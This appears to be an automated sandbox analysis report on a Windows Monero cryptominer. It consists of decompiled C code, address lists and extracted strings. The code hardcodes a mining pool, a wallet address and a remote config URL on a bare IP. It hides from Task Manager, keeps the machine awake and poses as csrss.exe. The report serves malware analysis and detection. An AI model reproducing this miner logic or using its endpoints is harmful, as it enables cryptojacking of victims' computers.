                                                                                                        											_t183 = _t182 + 4;
                                                                                                        											if(_t84 != 0) {
                                                                                                        												E014630B0( &_v1112,  &_v2136,  &_v3160);
                                                                                                        												__imp__SetThreadExecutionState(0x80000041, 0);
                                                                                                        												_t89 = E01463CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
                                                                                                        												_t185 = _t183 + 0x24;
                                                                                                        												if(_t89 == 0) {
                                                                                                        													L91:
                                                                                                        													ExitProcess(0x3d);
                                                                                                        												}
                                                                                                        												_t90 = E01463CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
                                                                                                        												_t186 = _t185 + 0x14;
                                                                                                        												if(_t90 == 0) {
                                                                                                        													goto L91;
                                                                                                        												}
                                                                                                        												L38:
                                                                                                        												while(1) {
                                                                                                        													if( *0x1631300 != 0) {
                                                                                                        														_t169 = _v28;
                                                                                                        														if(_t169 == 0) {
                                                                                                        															_t96 = GetTickCount();
                                                                                                        															_t215 = _t96 - _v36 - 0x4e20;
                                                                                                        															if(_t96 - _v36 > 0x4e20) {
                                                                                                        																E014665D0(_t215);
                                                                                                        																_t170 =  !=  ? 1 : _t169;
                                                                                                        																_v28 =  !=  ? 1 : _t169;
                                                                                                        															}
                                                                                                        														}
                                                                                                        													}
                                                                                                        													if( *0x1631308 == 3) {
                                                                                                        														_t160 =  *0x1631310; // 0x7530
                                                                                                        														_t161 = _t160 + 1;
                                                                                                        														__eflags = _t161;
                                                                                                        													} else {
                                                                                                        														_t161 = E01468040();
                                                                                                        													}
                                                                                                        													_t91 = E01468A50(_t150);
                                                                                                        													_t187 = _t186 + 4;
                                                                                                        													_t168 =  ==  ? 1 : _t91;
                                                                                                        													if( *0x1631304 == 0) {
                                                                                                        														_t93 = _v12;
                                                                                                        													} else {
                                                                                                        														_t93 = E01467EF0("taskmgr.exe");
                                                                                                        														_t187 = _t187 + 4;
                                                                                                        														_v12 = _t93;
                                                                                                        													}
                                                                                                        													if(_t150 == 0 || _t168 == 0) {
                                                                                                        														if(_t93 != 0) {
                                                                                                        															goto L58;
                                                                                                        														}
                                                                                                        														_t223 =  *0x1631320 - _t93; // 0x0
                                                                                                        														if(_t223 != 0 ||  *0x1632110 != _t93) {
                                                                                                        															goto L58;
                                                                                                        														} else {
                                                                                                        															_t225 = _t161 -  *0x1631310; // 0x7530
                                                                                                        															if(_t225 <= 0) {
                                                                                                        																__eflags =  *0x1631308;
                                                                                                        																if( *0x1631308 != 0) {
                                                                                                        																	_t117 = E01463050(_t150, _t152,  &_v2136, 0);
                                                                                                        																	_t187 = _t187 + 8;
                                                                                                        																	_t150 = _t117;
                                                                                                        																	_t168 = 1;
                                                                                                        																}
                                                                                                        																_v8 = 0;
                                                                                                        																goto L68;
                                                                                                        															}
                                                                                                        															_t119 = E01463050(_t150, _t152,  &_v3160, _t93);
                                                                                                        															_t187 = _t187 + 8;
                                                                                                        															_v8 = 1;
                                                                                                        															_t150 = _t119;
                                                                                                        															_t168 = 1;
                                                                                                        															goto L59;
                                                                                                        														}
                                                                                                        													} else {
                                                                                                        														L58:
                                                                                                        														__eflags = _v8;
                                                                                                        														if(_v8 == 0) {
                                                                                                        															L68:
                                                                                                        															_t234 = _t161 -  *0x1631310; // 0x7530
                                                                                                        															if(_t234 <= 0) {
                                                                                                        																L75:
                                                                                                        																__eflags = _v12;
                                                                                                        																if(_v12 == 0) {
                                                                                                        																	L77:
                                                                                                        																	if( *0x1631320 == 0) {
                                                                                                        																		L79:
                                                                                                        																		if( *0x1632110 == 0) {
                                                                                                        																			L82:
                                                                                                        																			_t94 = E014617B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                        																			_t186 = _t187 + 8;
                                                                                                        																			if(_t94 != 0) {
                                                                                                        																				_t99 = GetTickCount();
                                                                                                        																				_t152 =  *0x1631bb4 * 0xea60;
                                                                                                        																				_t245 = _t99 - _v32 -  *0x1631bb4 * 0xea60;
                                                                                                        																				if(_t99 - _v32 >  *0x1631bb4 * 0xea60) {
                                                                                                        																					_v32 = GetTickCount();
                                                                                                        																					_t102 = E01464DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", 0x1632128, _t150, _t168);
                                                                                                        																					_t186 = _t186 + 0x14;
                                                                                                        																					if(_t102 != 0) {
                                                                                                        																						if(E014639B0(_t153) != 0) {
                                                                                                        																							if(_t168 != 0) {
                                                                                                        																								E01468730(_t150);
                                                                                                        																								_t186 = _t186 + 4;
                                                                                                        																							}
                                                                                                        																							E01463CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
                                                                                                        																							E01463CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x16312c0,  *0x163131c);
                                                                                                        																							_t186 = _t186 + 0x28;
                                                                                                        																						}
                                                                                                        																						E01463B50(_t153, _v20, _v16);
                                                                                                        																						_t186 = _t186 + 8;
                                                                                                        																					}
                                                                                                        																				}
                                                                                                        																			}
                                                                                                        																			Sleep(0xfa0);
                                                                                                        																			continue;
                                                                                                        																		}
                                                                                                        																		L80:
                                                                                                        																		if(_t168 == 0) {
                                                                                                        																			goto L82;
                                                                                                        																		}
                                                                                                        																		L81:
                                                                                                        																		E01468730(_t150);
                                                                                                        																		_t187 = _t187 + 4;
                                                                                                        																		_t168 = 0;
                                                                                                        																		goto L82;
                                                                                                        																	}
                                                                                                        																	L78:
                                                                                                        																	if(_t168 != 0) {
                                                                                                        																		goto L81;
                                                                                                        																	}
                                                                                                        																	goto L79;
                                                                                                        																}
                                                                                                        																L76:
                                                                                                        																__eflags = _t168;
                                                                                                        																if(_t168 != 0) {
                                                                                                        																	goto L81;
                                                                                                        																}
                                                                                                        																goto L77;
                                                                                                        															}
                                                                                                        															if(_v12 != 0) {
                                                                                                        																goto L76;
                                                                                                        															}
                                                                                                        															if( *0x1631320 != 0) {
                                                                                                        																goto L78;
                                                                                                        															}
                                                                                                        															if( *0x1632110 != 0) {
                                                                                                        																goto L80;
                                                                                                        															}
                                                                                                        															if(_t168 != 0) {
                                                                                                        																E01468730(_t150);
                                                                                                        																_t187 = _t187 + 4;
                                                                                                        															}
                                                                                                        															_t110 = E01463050(_t150, _t152,  &_v3160, 0);
                                                                                                        															_t187 = _t187 + 8;
                                                                                                        															_v8 = 1;
                                                                                                        															_t150 = _t110;
                                                                                                        															_t168 = 1;
                                                                                                        															goto L77;
                                                                                                        														}
                                                                                                        														L59:
                                                                                                        														_t226 = _t161 -  *0x1631310; // 0x7530
                                                                                                        														if(_t226 > 0) {
                                                                                                        															goto L75;
                                                                                                        														}
                                                                                                        														if(_v12 != 0) {
                                                                                                        															goto L76;
                                                                                                        														}
                                                                                                        														if( *0x1631320 != 0) {
                                                                                                        															goto L78;
                                                                                                        														}
                                                                                                        														if( *0x1632110 != 0) {
                                                                                                        															goto L80;
                                                                                                        														}
                                                                                                        														if(_t168 != 0) {
                                                                                                        															E01468730(_t150);
                                                                                                        															_t187 = _t187 + 4;
                                                                                                        															_t168 = 0;
                                                                                                        														}
                                                                                                        														if( *0x1631308 != 0) {
                                                                                                        															_t114 = E01463050(_t150, _t152,  &_v2136, 0);
                                                                                                        															_t187 = _t187 + 8;
                                                                                                        															_t150 = _t114;
                                                                                                        															_t168 = 1;
                                                                                                        														}
                                                                                                        														_v8 = 0;
                                                                                                        														goto L68;
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        											ExitProcess(0x1c);
                                                                                                        										} else {
                                                                                                        											asm("movq xmm0, [0x163206c]");
                                                                                                        											_v40 =  *0x1632074;
                                                                                                        											asm("movq [ebp-0x2c], xmm0");
                                                                                                        											_v38 = _t150;
                                                                                                        											E01461A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        											_t125 = E01461600( &_v72,  &_v48);
                                                                                                        											_t183 = _t182 + 0x10;
                                                                                                        											if(_t125 == 0) {
                                                                                                        												ExitProcess(0x2f);
                                                                                                        											}
                                                                                                        											E01461970( &_v592, "\\");
                                                                                                        											E01461970( &_v592,  &_v72);
                                                                                                        											E01461970( &_v592, "_");
                                                                                                        											E01461970( &_v592, L"3.1.0");
                                                                                                        											_t188 = _t183 + 0x20;
                                                                                                        											_t137 =  *0x16310b8( &_v592,  &_v20, 0, 0);
                                                                                                        											_t207 = _t137 - 1;
                                                                                                        											if(_t137 == 1) {
                                                                                                        												_t139 = E014637E0(_t207,  &_v592);
                                                                                                        												_t189 = _t188 + 4;
                                                                                                        												_t208 = _t139;
                                                                                                        												if(_t139 != 0) {
                                                                                                        													E014639B0(_t153);
                                                                                                        													_push(_v16);
                                                                                                        													E01463680(_t153, _v20);
                                                                                                        													_t189 = _t189 + 8;
                                                                                                        												}
                                                                                                        												_t140 = E01464DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", 0x1632128, 0, 0);
                                                                                                        												_t182 = _t189 + 0x14;
                                                                                                        												if(_t140 != 0) {
                                                                                                        													E014639B0(_t153);
                                                                                                        													E01463B50(_t153, _v20, _v16);
                                                                                                        													_t182 = _t182 + 8;
                                                                                                        												}
                                                                                                        												goto L33;
                                                                                                        											}
                                                                                                        											ExitProcess(0x3c);
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										ExitProcess(0x32);
                                                                                                        									}
                                                                                                        								}
                                                                                                        								ExitProcess(0x31);
                                                                                                        							}
                                                                                                        							ExitProcess(0x30);
                                                                                                        						}
                                                                                                        						ExitProcess(0x30);
                                                                                                        					} else {
                                                                                                        						ExitProcess(0x30);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				ExitProcess(0x3b);
                                                                                                        			}

                                                                                                        0x0146447e
                                                                                                        0x01464481
                                                                                                        0x01464484
                                                                                                        0x01464487
                                                                                                        0x0146448d
                                                                                                        0x0146448f
                                                                                                        0x0146449d
                                                                                                        0x014644a0
                                                                                                        0x014644a3
                                                                                                        0x014644a9
                                                                                                        0x014644b9
                                                                                                        0x014644be
                                                                                                        0x014644c3
                                                                                                        0x014644db
                                                                                                        0x014644db
                                                                                                        0x014644eb
                                                                                                        0x014644f7
                                                                                                        0x014644fc
                                                                                                        0x0146450e
                                                                                                        0x01464512
                                                                                                        0x01464512
                                                                                                        0x01464518
                                                                                                        0x0146451e
                                                                                                        0x01464520
                                                                                                        0x01464525
                                                                                                        0x01464529
                                                                                                        0x01464529
                                                                                                        0x0146452f
                                                                                                        0x01464545
                                                                                                        0x01464549
                                                                                                        0x01464559
                                                                                                        0x0146455e
                                                                                                        0x01464563
                                                                                                        0x01464565
                                                                                                        0x01464565
                                                                                                        0x0146456c
                                                                                                        0x01464578
                                                                                                        0x0146457d
                                                                                                        0x01464580
                                                                                                        0x01464582
                                                                                                        0x01464591
                                                                                                        0x01464596
                                                                                                        0x01464599
                                                                                                        0x0146459f
                                                                                                        0x014645ab
                                                                                                        0x014645b0
                                                                                                        0x014645b0
                                                                                                        0x014645bd
                                                                                                        0x014645c2
                                                                                                        0x014645c7
                                                                                                        0x014645db
                                                                                                        0x014645e0
                                                                                                        0x014645e5
                                                                                                        0x014645f9
                                                                                                        0x014645fe
                                                                                                        0x01464603
                                                                                                        0x01464619
                                                                                                        0x0146461e
                                                                                                        0x01464623
                                                                                                        0x01464637
                                                                                                        0x01464646
                                                                                                        0x0146464b
                                                                                                        0x0146465d
                                                                                                        0x01464677
                                                                                                        0x01464697
                                                                                                        0x01464697
                                                                                                        0x014646a6
                                                                                                        0x014646ab
                                                                                                        0x014646b0
                                                                                                        0x014647b8
                                                                                                        0x014647bf
                                                                                                        0x014647c4
                                                                                                        0x014647c9
                                                                                                        0x014647f2
                                                                                                        0x014647ff
                                                                                                        0x0146481c
                                                                                                        0x01464821
                                                                                                        0x01464826
                                                                                                        0x01464af0
                                                                                                        0x01464af2
                                                                                                        0x01464af2
                                                                                                        0x01464843
                                                                                                        0x01464848
                                                                                                        0x0146484d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464853
                                                                                                        0x0146485f
                                                                                                        0x01464861
                                                                                                        0x01464866
                                                                                                        0x01464868
                                                                                                        0x01464871
                                                                                                        0x01464876
                                                                                                        0x01464878
                                                                                                        0x0146487f
                                                                                                        0x01464882
                                                                                                        0x01464882
                                                                                                        0x01464876
                                                                                                        0x01464866
                                                                                                        0x0146488c
                                                                                                        0x01464897
                                                                                                        0x0146489d
                                                                                                        0x0146489d
                                                                                                        0x0146488e
                                                                                                        0x01464893
                                                                                                        0x01464893
                                                                                                        0x0146489f
                                                                                                        0x014648a6
                                                                                                        0x014648b1
                                                                                                        0x014648bb
                                                                                                        0x014648cf
                                                                                                        0x014648bd
                                                                                                        0x014648c2
                                                                                                        0x014648c7
                                                                                                        0x014648ca
                                                                                                        0x014648ca
                                                                                                        0x014648d4
                                                                                                        0x014648dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014648de
                                                                                                        0x014648e4
                                                                                                        0x00000000
                                                                                                        0x014648ee
                                                                                                        0x014648ee
                                                                                                        0x014648f4
                                                                                                        0x01464916
                                                                                                        0x0146491d
                                                                                                        0x01464928
                                                                                                        0x0146492d
                                                                                                        0x01464930
                                                                                                        0x01464932
                                                                                                        0x01464932
                                                                                                        0x01464937
                                                                                                        0x00000000
                                                                                                        0x01464937
                                                                                                        0x014648fe
                                                                                                        0x01464903
                                                                                                        0x01464906
                                                                                                        0x0146490d
                                                                                                        0x0146490f
                                                                                                        0x00000000
                                                                                                        0x0146490f
                                                                                                        0x01464940
                                                                                                        0x01464940
                                                                                                        0x01464940
                                                                                                        0x01464944
                                                                                                        0x014649ab
                                                                                                        0x014649ab
                                                                                                        0x014649b1
                                                                                                        0x014649f9
                                                                                                        0x014649f9
                                                                                                        0x014649fd
                                                                                                        0x01464a03
                                                                                                        0x01464a0a
                                                                                                        0x01464a10
                                                                                                        0x01464a17
                                                                                                        0x01464a28
                                                                                                        0x01464a32
                                                                                                        0x01464a37
                                                                                                        0x01464a3c
                                                                                                        0x01464a48
                                                                                                        0x01464a4a
                                                                                                        0x01464a57
                                                                                                        0x01464a59
                                                                                                        0x01464a72
                                                                                                        0x01464a75
                                                                                                        0x01464a7a
                                                                                                        0x01464a7f
                                                                                                        0x01464a88
                                                                                                        0x01464a8c
                                                                                                        0x01464a8f
                                                                                                        0x01464a94
                                                                                                        0x01464a94
                                                                                                        0x01464aae
                                                                                                        0x01464aca
                                                                                                        0x01464acf
                                                                                                        0x01464acf
                                                                                                        0x01464ad8
                                                                                                        0x01464add
                                                                                                        0x01464add
                                                                                                        0x01464a7f
                                                                                                        0x01464a59
                                                                                                        0x01464ae5
                                                                                                        0x00000000
                                                                                                        0x01464ae5
                                                                                                        0x01464a19
                                                                                                        0x01464a1b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464a1d
                                                                                                        0x01464a1e
                                                                                                        0x01464a23
                                                                                                        0x01464a26
                                                                                                        0x00000000
                                                                                                        0x01464a26
                                                                                                        0x01464a0c
                                                                                                        0x01464a0e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464a0e
                                                                                                        0x014649ff
                                                                                                        0x014649ff
                                                                                                        0x01464a01
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464a01
                                                                                                        0x014649b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014649c0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014649c9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014649cd
                                                                                                        0x014649d0
                                                                                                        0x014649d5
                                                                                                        0x014649d5
                                                                                                        0x014649e1
                                                                                                        0x014649e6
                                                                                                        0x014649e9
                                                                                                        0x014649f0
                                                                                                        0x014649f2
                                                                                                        0x00000000
                                                                                                        0x014649f2
                                                                                                        0x01464946
                                                                                                        0x01464946
                                                                                                        0x0146494c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464956
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464963
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464970
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01464978
                                                                                                        0x0146497b
                                                                                                        0x01464980
                                                                                                        0x01464983
                                                                                                        0x01464983
                                                                                                        0x0146498c
                                                                                                        0x01464997
                                                                                                        0x0146499c
                                                                                                        0x0146499f
                                                                                                        0x014649a1
                                                                                                        0x014649a1
                                                                                                        0x014649a8
                                                                                                        0x00000000
                                                                                                        0x014649a8
                                                                                                        0x014648d4
                                                                                                        0x01464853
                                                                                                        0x014647cd
                                                                                                        0x014646b6
                                                                                                        0x014646bc

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 01464487
                                                                                                        • SetErrorMode.KERNEL32(00000002), ref: 014644E5
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 014644EB
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,0163206C), ref: 01464506
                                                                                                        • ExitProcess.KERNEL32 ref: 01464512
                                                                                                        • GetLastError.KERNEL32 ref: 0146451E
                                                                                                        • ExitProcess.KERNEL32 ref: 01464529
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Error$ExitModeProcess$CountCreateLastMutexTick
                                                                                                        • String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$pool.supportxmr.com:3333$taskmgr.exe$viTRMUuKeV$viTRMUuKeV
                                                                                                        • API String ID: 3615071802-2903677349
                                                                                                        • Opcode ID: f757e012b8e5c9be1cc4ef72914bb43f19e5256e2a30d542f464387e603255b3
                                                                                                        • Instruction ID: 22692199d367d980b2c72f1cdd37093adc39a6a7a3fc8ba0592725a7d3bf10cd
                                                                                                        • Opcode Fuzzy Hash: f757e012b8e5c9be1cc4ef72914bb43f19e5256e2a30d542f464387e603255b3
                                                                                                        • Instruction Fuzzy Hash: BBF11EB5E40305ABEF21ABB5DD05B9F366CAB2174EF08002BEA05B2271E7B49554CB53
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E01463220(void* __ecx, void* __esi, void* __eflags) {
                                                                                                        				intOrPtr _t10;
                                                                                                        				intOrPtr _t14;
                                                                                                        				void* _t17;
                                                                                                        				intOrPtr _t19;
                                                                                                        				intOrPtr _t27;
                                                                                                        				void* _t31;
                                                                                                        				void* _t35;
                                                                                                        				long _t37;
                                                                                                        				short _t38;
                                                                                                        				void* _t41;
                                                                                                        				void* _t43;
                                                                                                        				struct HINSTANCE__* _t44;
                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                        				struct HINSTANCE__* _t48;
                                                                                                        				struct HINSTANCE__* _t50;
                                                                                                        				struct HINSTANCE__* _t52;
                                                                                                        				struct HINSTANCE__* _t54;
                                                                                                        				intOrPtr _t56;
                                                                                                        				struct HINSTANCE__* _t58;
                                                                                                        				struct HINSTANCE__* _t60;
                                                                                                        				void* _t67;
                                                                                                        				void* _t70;
                                                                                                        				void* _t73;
                                                                                                        
                                                                                                        				_t67 = __esi;
                                                                                                        				_t43 = __ecx;
                                                                                                        				 *0x1631300 = 0;
                                                                                                        				 *0x1631304 = 0;
                                                                                                        				 *0x1631308 = 0;
                                                                                                        				 *0x163130c = 0;
                                                                                                        				 *0x1631310 = 0x7530;
                                                                                                        				 *0x1631238 = 0x5f;
                                                                                                        				 *0x16312bc = 0x18;
                                                                                                        				 *0x16319ac = 0x20;
                                                                                                        				 *0x16319b0 = 5;
                                                                                                        				 *0x1631318 = 0;
                                                                                                        				 *0x163131c = 0;
                                                                                                        				 *0x1631320 = 0;
                                                                                                        				 *0x1631bb8 = 1;
                                                                                                        				 *0x1631bbc = 0xa;
                                                                                                        				 *0x1631bc0 = 0;
                                                                                                        				 *0x1631c24 = 0;
                                                                                                        				 *0x163210c = 1;
                                                                                                        				E01461BB0(0x163208c, 0, 0x80);
                                                                                                        				E014617E0(0x163208c, "[no-email]");
                                                                                                        				E014617E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				 *0x1631c48 = 0;
                                                                                                        				asm("movups [0x1631c28], xmm0");
                                                                                                        				asm("movups [0x1631c38], xmm0");
                                                                                                        				E01461BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
                                                                                                        				E01461BB0("csrss.exe", 0, 0x60);
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movups [0x163158c], xmm0");
                                                                                                        				asm("movups [0x163159c], xmm0");
                                                                                                        				E01461BB0(0x16319b4, 0, 0x200);
                                                                                                        				E01461BB0(0x16312c0, 0, 0x40);
                                                                                                        				E01461640(0x16312c0, 0x1469df0, 0x40);
                                                                                                        				E01461BB0("http://45.144.225.135/config.txt", 0, 0x200);
                                                                                                        				_t10 =  *0x16319ac; // 0x20
                                                                                                        				E01461640("http://45.144.225.135/config.txt", 0x1469e30, _t10 + 1);
                                                                                                        				E01461BB0("FALSE", 0, 0x200);
                                                                                                        				_t14 =  *0x16319b0; // 0x5
                                                                                                        				E01461640("FALSE", "FALSE", _t14 + 1);
                                                                                                        				_t17 = E014617B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                        				_t73 = _t70 + 0x90;
                                                                                                        				if(_t17 != 0) {
                                                                                                        					E01461CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x16319ac);
                                                                                                        					_t41 = E014617B0("FALSE", "FALSE");
                                                                                                        					_t73 = _t73 + 0x18;
                                                                                                        					if(_t41 != 0) {
                                                                                                        						E01461CE0("0125789244697858", 0x10, "FALSE",  *0x16319b0);
                                                                                                        						_t73 = _t73 + 0x10;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t19 = E01468270(_t43, GetCurrentProcess());
                                                                                                        				 *0x1631314 = _t19;
                                                                                                        				if(_t19 != 0) {
                                                                                                        					E01468DD0();
                                                                                                        					_t60 =  *0x1631318; // 0x0
                                                                                                        					_t61 =  ==  ? 1 : _t60;
                                                                                                        					 *0x1631318 =  ==  ? 1 : _t60;
                                                                                                        				}
                                                                                                        				_push(_t67);
                                                                                                        				E014617B0("TRUE", "TRUE");
                                                                                                        				_t44 =  *0x1631300; // 0x1
                                                                                                        				_t45 =  ==  ? 1 : _t44;
                                                                                                        				 *0x1631300 =  ==  ? 1 : _t44;
                                                                                                        				E014617B0("TASKMGR", "TASKMGR");
                                                                                                        				_t46 =  *0x1631304; // 0x1
                                                                                                        				_t47 =  ==  ? 1 : _t46;
                                                                                                        				 *0x1631304 =  ==  ? 1 : _t46;
                                                                                                        				E014617B0("1THREAD", "50%CPU");
                                                                                                        				_t48 =  *0x1631308; // 0x2
                                                                                                        				_t49 =  ==  ? 1 : _t48;
                                                                                                        				 *0x1631308 =  ==  ? 1 : _t48;
                                                                                                        				E014617B0("50%CPU", "50%CPU");
                                                                                                        				_t50 =  *0x1631308; // 0x2
                                                                                                        				_t51 =  ==  ? 2 : _t50;
                                                                                                        				 *0x1631308 =  ==  ? 2 : _t50;
                                                                                                        				E014617B0("100%CPU", "50%CPU");
                                                                                                        				_t52 =  *0x1631308; // 0x2
                                                                                                        				_t53 =  ==  ? 3 : _t52;
                                                                                                        				 *0x1631308 =  ==  ? 3 : _t52;
                                                                                                        				E014617B0("100%CPU", "100%CPU");
                                                                                                        				_t54 =  *0x163130c; // 0x1
                                                                                                        				_t55 =  ==  ? 1 : _t54;
                                                                                                        				 *0x1631bb4 = 0x1e;
                                                                                                        				 *0x163130c =  ==  ? 1 : _t54;
                                                                                                        				E01461BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0, 0x100);
                                                                                                        				_t27 =  *0x1631238; // 0x5f
                                                                                                        				E01461640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x1469f40, _t27 + 1);
                                                                                                        				E01461CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x1631238);
                                                                                                        				_t31 = E01461BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  *0x1631238);
                                                                                                        				E01461BB0("pool.supportxmr.com:3333", 0, 0x80);
                                                                                                        				_t56 =  *0x16312bc; // 0x18
                                                                                                        				E01461640("pool.supportxmr.com:3333", 0x146a018, _t56 + 1);
                                                                                                        				E01461CE0("0125789244697858", 0x10, "pool.supportxmr.com:3333",  *0x16312bc);
                                                                                                        				_t35 = E01461BE0("pool.supportxmr.com:3333",  *0x16312bc);
                                                                                                        				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
                                                                                                        					ExitProcess(0x27);
                                                                                                        				}
                                                                                                        				E014618D0("pool.supportxmr.com:3333", "nicehash.com");
                                                                                                        				_t58 =  *0x163131c; // 0x0
                                                                                                        				_t59 =  !=  ? 1 : _t58;
                                                                                                        				 *0x163131c =  !=  ? 1 : _t58;
                                                                                                        				_t37 = GetModuleFileNameW(0, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200);
                                                                                                        				if(_t37 == 0 || _t37 == 0x200) {
                                                                                                        					_t38 = 0;
                                                                                                        					 *0x1631c4c = 0;
                                                                                                        					goto L12;
                                                                                                        				} else {
                                                                                                        					_t38 = E01468B20("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "d572da9202196121d952231f26d65d07");
                                                                                                        					if(_t38 == 0) {
                                                                                                        						L12:
                                                                                                        						 *0x1631c28 = 0;
                                                                                                        						 *0x1632110 = 0;
                                                                                                        						return _t38;
                                                                                                        					} else {
                                                                                                        						 *0x1631c48 = 0;
                                                                                                        						 *0x1632110 = 0;
                                                                                                        						return _t38;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x01463453
                                                                                                        0x01463453
                                                                                                        0x01463459
                                                                                                        0x01463464
                                                                                                        0x01463469
                                                                                                        0x01463476
                                                                                                        0x0146347e
                                                                                                        0x01463484
                                                                                                        0x01463489
                                                                                                        0x01463496
                                                                                                        0x0146349e
                                                                                                        0x014634a4
                                                                                                        0x014634a9
                                                                                                        0x014634b6
                                                                                                        0x014634be
                                                                                                        0x014634c4
                                                                                                        0x014634c9
                                                                                                        0x014634d6
                                                                                                        0x014634e3
                                                                                                        0x014634e9
                                                                                                        0x014634ee
                                                                                                        0x014634fb
                                                                                                        0x01463508
                                                                                                        0x0146350e
                                                                                                        0x01463513
                                                                                                        0x01463520
                                                                                                        0x01463523
                                                                                                        0x01463534
                                                                                                        0x0146353a
                                                                                                        0x0146353f
                                                                                                        0x01463550
                                                                                                        0x0146356a
                                                                                                        0x0146357a
                                                                                                        0x0146358d
                                                                                                        0x01463592
                                                                                                        0x014635a4
                                                                                                        0x014635bb
                                                                                                        0x014635ce
                                                                                                        0x014635dd
                                                                                                        0x01463673
                                                                                                        0x01463673
                                                                                                        0x014635f8
                                                                                                        0x014635fd
                                                                                                        0x01463608
                                                                                                        0x01463617
                                                                                                        0x0146361d
                                                                                                        0x01463626
                                                                                                        0x01463657
                                                                                                        0x01463659
                                                                                                        0x00000000
                                                                                                        0x0146362f
                                                                                                        0x01463639
                                                                                                        0x01463643
                                                                                                        0x0146365f
                                                                                                        0x0146365f
                                                                                                        0x01463666
                                                                                                        0x01463670
                                                                                                        0x01463645
                                                                                                        0x01463645
                                                                                                        0x0146364c
                                                                                                        0x01463656
                                                                                                        0x01463656
                                                                                                        0x01463643

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(75144D40), ref: 01463426
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200), ref: 0146361D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
